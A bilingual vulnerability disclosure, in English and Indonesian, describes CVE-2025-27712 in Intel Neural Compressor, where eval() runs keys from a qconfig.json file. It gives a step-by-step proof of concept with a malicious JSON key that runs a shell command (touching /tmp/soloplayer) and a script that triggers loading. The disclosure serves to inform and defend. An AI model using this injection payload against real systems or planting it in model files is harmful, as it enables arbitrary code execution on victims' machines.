Privilege Escalation in Intel Neural Compressor via eval() CVE-2025-27712

Written by Muhammad Fadilullah Dzaki (@0xboyz)

Story

It was past midnight when I found myself drifting through the internals of Intel’s Neural Compressor. The room was quiet, the only sound the soft hum of my laptop’s fan struggling against the weight of countless repositories I had open. I wasn’t searching for trouble. All I wanted was to understand how this framework handled model configuration. Something simple. Something harmless.

But the universe has a habit of placing small anomalies in your path when you least expect them. A function name caught my eye inside the load_config_mapping implementation. It felt ordinary at first glance. A utility function meant to map configuration keys. Straightforward. Routine.

Then I saw it. eval().

In that quiet moment, everything around me froze. My fingers hovered above the keyboard. The presence of eval in a function that processed user-supplied configuration data wasn’t just a misstep. It was an invitation. A silent door left ajar. A place where anything crafted carefully enough could slip through and execute in the heart of the system.

I read the line again. And again. And every time, the weight of it became clearer. If someone slipped malicious code inside qconfig.json, the framework would execute it without hesitation. No warnings. No barriers. Just blind trust.

That was all it took for the story to change. What began as a casual evening code read turned into a path that revealed a full Privilege Escalation vulnerability. A weakness hidden not in some obscure binary, but right in a JSON configuration parser trusted by countless developers.

Root Cause

At the heart of the issue lies the use of eval on keys loaded directly from user-supplied JSON files. It means that any string placed as a key will be interpreted and executed as Python code.

Direct reference to vulnerable code:

https://github.com/intel/neural-compressor/blob/v2.5/neural_compressor/common/utils/save_load.py#L54

Proof of Concept (PoC)

1. Install Intel Neural Compressor: pip install neural-compressor

2. Run configuration script (config.py):

import torch
from torchvision.models import resnet18
from neural_compressor.torch.quantization import prepare, convert, RTNConfig

model = resnet18(pretrained=True)
quant_config = RTNConfig()
model = prepare(model, quant_config)
model = convert(model)
model.save("saved_results")

3. Replace saved_results/qconfig.json with payload:

{
  "('dummy_op', import('os').system('touch /tmp/soloplayer'))": {
    "default": {
      "some_key": "some_value"
    }
  }
}

4. Run exploit script (exploit.py):

import os
from torchvision.models import resnet18
from neural_compressor.torch.quantization import load

orig_model = resnet18(pretrained=True)
print("[*] Loading model with malicious qconfig.json...")
_ = load("saved_results", original_model=orig_model)

5. Verify created file:

ls -l /tmp/soloplayer

Impact

This vulnerability enables full arbitrary command execution, allowing attackers to run system-level commands simply by tricking the framework into loading a malicious qconfig.json file.

References

Privilege Escalation pada Intel Neural Compressor melalui eval() CVE-2025-27712

Ditulis oleh Muhammad Fadilullah Dzaki (@0xboyz)

Cerita

Malam itu sunyi ketika saya menelusuri bagian dalam Intel Neural Compressor. Lampu kamar sudah redup, hanya layar laptop yang terus menyala. Awalnya saya hanya ingin memahami bagaimana framework ini memetakan konfigurasi model. Tidak ada misi. Tidak ada rasa curiga. Hanya rasa penasaran biasa.

Hingga saya menemukan sebuah fungsi yang tampak sederhana. load_config_mapping. Fungsinya terlihat biasa saja. Mengambil key dari konfigurasi, lalu memetakan nilainya. Seharusnya aman. Seharusnya tidak ada yang spesial.

Namun mata saya berhenti pada satu baris. eval().

Detik itu juga perasaan saya berubah. Tangan saya terhenti, pikiran saya mulai menerka. Penggunaan eval pada input dari file konfigurasi yang bisa dibuat oleh pengguna bukan hanya kelalaian. Itu adalah celah. Sebuah pintu yang dibiarkan terbuka cukup lebar bagi siapa saja yang ingin melangkah masuk tanpa izin.

Baris kode itu memproses key JSON langsung sebagai Python code. Artinya jika seseorang memasukkan payload berbahaya ke dalam qconfig.json, perintah itu akan dijalankan oleh sistem tanpa penolakan sedikit pun.

Momen sederhana itu menjadi titik awal ditemukannya kerentanan Privilege Escalation yang sepenuhnya dapat dieksploitasi. Sebuah bug yang tersembunyi bukan di binary obscure, tetapi di parser JSON yang dipercaya banyak developer.

Akar Masalah

Masalah inti berasal dari penggunaan eval pada key yang berasal dari file konfigurasi buatan pengguna. Setiap string yang ada dalam key dieksekusi sebagai kode Python.

Referensi langsung ke kode rentan:

https://github.com/intel/neural-compressor/blob/v2.5/neural_compressor/common/utils/save_load.py#L54

Proof of Concept (PoC)

1. Install Intel Neural Compressor: pip install neural-compressor

2. Jalankan script konfigurasi (config.py):

import torch
from torchvision.models import resnet18
from neural_compressor.torch.quantization import prepare, convert, RTNConfig

model = resnet18(pretrained=True)
quant_config = RTNConfig()
model = prepare(model, quant_config)
model = convert(model)
model.save("saved_results")

3. Ganti file qconfig.json dengan payload berikut:

{
  "('dummy_op', import('os').system('touch /tmp/soloplayer'))": {
    "default": {
      "some_key": "some_value"
    }
  }
}

4. Jalankan script exploit (exploit.py):

import os
from torchvision.models import resnet18
from neural_compressor.torch.quantization import load

orig_model = resnet18(pretrained=True)
print("[*] Loading model with malicious qconfig.json...")
_ = load("saved_results", original_model=orig_model)

5. Cek apakah file berhasil dibuat:

ls -l /tmp/soloplayer

Dampak

Kerentanan ini memungkinkan eksekusi penuh perintah sistem dengan hanya memuat file qconfig.json yang dimodifikasi. Hal ini dapat menyebabkan kompromi sistem total.